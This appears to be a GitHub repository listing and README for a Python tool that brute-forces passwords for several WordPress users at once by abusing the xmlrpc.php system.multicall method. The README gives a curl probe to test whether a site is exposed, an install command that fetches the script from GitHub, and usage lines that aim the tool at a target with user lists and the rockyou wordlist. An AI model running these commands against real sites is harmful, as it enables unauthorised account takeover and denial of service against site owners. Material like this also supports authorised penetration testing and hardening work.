https://github.com/entr0pie/wp-multi-bruteforce
Script for bruteforcing multiple Wordpress Users (XMLRPC)
https://github.com/entr0pie/wp-multi-bruteforce
brute-force brute-force-attacks bruteforce-wordlist bruteforcing wordpress wordpress-api wordpress-security wordpress-site xml xmlrpc xmlrpc-bruteforcer
Last synced: 8 months ago
JSON representation
Script for bruteforcing multiple Wordpress Users (XMLRPC)
- Host: GitHub
- URL: https://github.com/entr0pie/wp-multi-bruteforce
- Owner: entr0pie
- License: gpl-3.0
- Created: 2022-11-17T00:56:09.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2023-01-14T04:45:45.000Z (over 3 years ago)
- Last Synced: 2025-01-29T08:33:53.217Z (over 1 year ago)
- Topics: brute-force, brute-force-attacks, bruteforce-wordlist, bruteforcing, wordpress, wordpress-api, wordpress-security, wordpress-site, xml, xmlrpc, xmlrpc-bruteforcer
- Language: Python
- Homepage:
- Size: 233 KB
- Stars: 8
- Watchers: 1
- Forks: 4
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# WP Multi-User Bruteforce
Python 3 script for bruteforcing multiple Wordpress users using only one request per password.
## How does it work?
The [Hacktrick's Wordpress Pentesting Guide](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress#xml-rpc) mentions that, if xmlrpc.php is enabled, Bruteforcing and DoS attacks can be used by abusing the system functionalities, including trying multiple users with **only one request**, using the `system.multicall` function (see [here](https://1517081779-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FILyTlmNzv1D9YhHQAJo2%2Fimage.png?alt=media&token=5aa88cc4-baa0-4e54-87c1-2cc31203199d)).
## Testing the vulnerability
Run this command, replacing `your-blog.com` with your website:
```
YOURBLOG=http://your-blog.com/xmlrpc.php
curl -d "system.listMethods" -X POST $YOURBLOG
```
See if the response is an XML with all functionalities available, like:
```
system.multicall
system.listMethods
system.getCapabilities
demo.addTwoNumbers
[...]
```
If yes, it's probably vulnerable.
## Installation
```
pip install requests
curl https://raw.githubusercontent.com/entr0pie/xmlrpc-multi-request/main/xmlrpc.py | tee xmlrpc.py
```
## Usage
### Using the default wordlist (rockyou.txt)
```
python3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader
```
### Setting an wordlist:
```
python3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader --wordlist=my_wordlist.txt
```
### Start the bruteforce with an specific word inside the wordlist:
```
python3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader --wordlist=my_wordlist.txt --word=super_secure_password
```
### Using the config.json file:
By default, xmlrpc.py saves in the `config.json` the last session:
```
{
"host":"http://your-blog.com/xmlrpc.php",
"users":"['admin', 'editor', 'reader']",
"wordlist":"/usr/share/wordlists/rockyou.txt",
"word":"mcfly",
"debug":"False"
}
```
You can replay that session running:
```
python3 xmlrpc.py --config config.json
```
## License
This project is under [GNU GPLv3](LICENSE).